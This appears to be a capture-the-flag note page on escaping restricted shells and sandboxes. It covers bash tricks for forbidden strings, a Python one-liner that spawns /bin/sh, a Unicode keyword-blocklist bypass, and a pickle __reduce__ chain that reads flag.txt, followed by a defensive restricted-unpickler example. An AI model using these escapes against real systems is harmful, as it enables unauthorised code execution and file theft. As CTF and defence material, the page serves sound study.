Escape

Homebrew shells

List for *nix: gtfobins. List for Windows: LOLBAS.

If the challenge is a homemade shell with some artificial limitations, gtfobins and LOLBAS list myriad ways to escape. These aren't vulnerabilities, per se, but intended functionality of applications that are commonly installed.

Bash

Good ideas. List of parameter expansions.

Forbidden strings

${NOSUCHVAR:-fla}${NOSUCHVAR:-g.txt}    # expands to flag.txt

Stars aren't the only wildcard

fla?.txt
fl{a,A}g.txt
fl[a-z]g.txt

Docker

  • deepce, a vulnerability scanner.

  • grype, a vulnerability scanner.

  • WhaleScan, scans Windows containers.

Electron

Tell me more

view-source: isn't necessarily blocked like file:// is.

Perhaps the app even uses its own custom URI scheme?

git

git-shell tries to be restrictive server-side, but might not be.

Javascript

Sandboxes

Python

Tell me more

Python has so many ways to introspect, reflect, reload, import and execute unintended code.

Here's a pretty simple one:

import statistics
statistics.random._os._execvpe("/bin/sh", [], {})

Forbidden strings

If there's some sort of word blocklist, try unicode:

>>> 𝖕𝖗𝖎𝖓𝖙(1)
1

Python runs it just fine.

Pickle

Source

#!/usr/bin/env python3

# From the error message we can see that only __main__, __builtin__ and copyreg are allowed
# __builtin__.eval and __builtin__.exec are banned as well
# We can just open and print flag.txt by using __builtin__.open, followed by readlines and print
# This sequence of calls is constructed below by using multiple objects and the pickle __reduce__ interface

import base64
import builtins
import pickle

class FlagObjPickle:
    # Unpickles as builtins.open("./flag.txt"), i.e. a file object.
    def __reduce__(self):
        return builtins.open, ("./flag.txt",)
    # Stub so that FlagObjPickle().readlines is a bound method. Pickle serialises a
    # bound method as getattr(instance, "readlines"), and the instance is in turn
    # serialised through __reduce__ above, so on the target this becomes
    # getattr(open("./flag.txt"), "readlines").
    def readlines(self):
        pass

class ReadFlagPickle:
    # Calls that bound method with no arguments: open("./flag.txt").readlines()
    def __reduce__(self):
        return FlagObjPickle().readlines, tuple()

class PrintFlagPickle:
    # Prints the resulting list of lines.
    def __reduce__(self):
        return builtins.print, (ReadFlagPickle(),)

a = PrintFlagPickle()
pickled = pickle.dumps(a, 0)

Any callable reachable from the target's allowed namespaces can be invoked with (almost) arbitrary arguments by pickling a class that implements __reduce__ and returns the callable together with a tuple of arguments. The code above also shows how to chain such calls.
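Added here as a defender-side illustration (not code from the original writeup): the target's whole-module allowlist, which a __reduce__ chain like the one above slips through, next to a per-name allowlist that fails closed. CallOnLoad, the SAFE_GLOBALS contents and the len("abcd") stand-in are constructed for this example.

```python
import builtins
import collections
import io
import pickle

# Constructed for this demo: __reduce__ makes the unpickler call a callable
# of our choosing. builtins.len with a harmless argument stands in for
# whatever a real payload would name.
class CallOnLoad:
    def __reduce__(self):
        return builtins.len, ("abcd",)

def module_allowlist_loads(data: bytes):
    """The target's approach: every name in a few whole modules is allowed.
    Protocol 0 payloads spell the module __builtin__, so both spellings are listed."""
    class ModuleOnly(pickle.Unpickler):
        def find_class(self, module, name):
            if module in ("__main__", "__builtin__", "builtins", "copyreg"):
                return super().find_class(module, name)
            raise pickle.UnpicklingError(f"module {module} is forbidden")
    return ModuleOnly(io.BytesIO(data)).load()

# The fix: allow exact (module, name) pairs and fail closed on anything else,
# however the module is spelled. The contents are an assumed allowlist.
SAFE_GLOBALS = {
    ("collections", "OrderedDict"),
    ("builtins", "set"),
}

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")

def restricted_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()

def demo():
    payload = pickle.dumps(CallOnLoad(), protocol=0)  # protocol 0, as above
    loose = module_allowlist_loads(payload)          # len("abcd") ran: 4
    try:
        restricted_loads(payload)
        strict = "executed"
    except pickle.UnpicklingError:
        strict = "rejected"
    benign = restricted_loads(pickle.dumps(collections.OrderedDict(a=1)))
    return loose, strict, benign
```

demo() returns (4, "rejected", OrderedDict([('a', 1)])): the loose unpickler executed the planted call, the strict one refused it while still loading ordinary data.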
